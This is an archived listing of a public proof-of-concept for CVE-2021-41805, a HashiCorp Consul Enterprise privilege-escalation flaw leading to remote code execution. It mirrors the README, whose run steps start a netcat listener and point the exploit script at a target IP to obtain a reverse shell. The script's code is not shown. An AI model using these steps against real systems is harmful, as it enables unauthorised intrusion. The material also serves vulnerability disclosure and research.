Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-41805 PoC — Hashicorp HashiCorp Consul 安全漏洞

Source
https://github.com/acfirthh/CVE-2021-41805
Associated Vulnerability
Title:Hashicorp HashiCorp Consul 安全漏洞 (CVE-2021-41805)
Description:Hashicorp HashiCorp Consul是美国HashiCorp(Hashicorp)公司的一套分布式、高可用数据中心感知解决方案。该产品用于跨动态分布式基础架构连接和配置应用程序。 HashiCorp Consul Enterprise 存在安全漏洞,攻击者可以利用该漏洞提升权限。以下产品及版本受到影响:HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4。
Description
A proof-of-concept for CVE-2021-41805 which is a vulnerability in HashiCorp Consul Enterprise allowing for Remote Code Execution (RCE).
Readme
# CVE-2021-41805 - HashiCorp Consul Enterprise RCE

> [!WARNING]
> LEGAL DISCLAIMER:
> This tool is STRICTLY for EDUCATIONAL PURPOSES ONLY!
> Usage of this tool for attacking targets without prior mutual consent is ILLEGAL.
> It is the user's responsibility to obey all laws that apply whilst using this tool.
> The developer of this tool assumes no liability and is not responsible for any misuse
> or damage caused by this program.

## About the CVE
An **ACL token** (with the default **operator:write** permissions) in one namespace can be used for unintended privilege escalation in a different namespace. This can be abused to gain **Remote Code Execution (RCE)** with escalated privileges.

## Affected Versions
- < 1.8.17
- 1.9.x < 1.9.11
- 1.10.x < 1.10.4

## Installing and Running the Script
- First, clone the repository:\
`git clone https://github.com/acfirthh/CVE-2021-41805.git`
- Change directory into the cloned repository:\
`cd CVE-2021-41805`
- Start a simple listener:\
`nc -nvlp <LISTENER_PORT>`
- Run the script:\
`python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]`

![Reverse Shell](images/reverse_shell.png)

## Expected Output
Running the exploit with the basic arguments: **-r [TARGET_IP]**, **-rp [TARGET_PORT]**, **-l [LISTENER_IP]**, **-lp [LISTENER_PORT]** (**-t [ACL_TOKEN]**, **-s [Use SSL]**) will give basic output like:\
```
[*] The PUT request was made successfully. Check your listener...
```

Running the exploit with the basic arguments plus **-v [VERBOSE]** will give verbose output:\
![Verbose Output](images/verbose_output.png)

If an error occurs when the exploit is run and the **-v** argument is specified, the output will be something like:\
![Verbose Output with Error](images/verbose_output_error.png)
File Snapshot

 [4.0K]  /data/pocs/e5578d88836796a02dbc2a0e093346110c1f9243
├── [2.8K]  CVE-2021-41805.py
├── [4.0K]  images
│   ├── [ 14K]  reverse_shell.png
│   ├── [ 50K]  verbose_output_error.png
│   └── [ 32K]  verbose_output.png
├── [ 34K]  LICENSE
└── [1.8K]  README.md

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.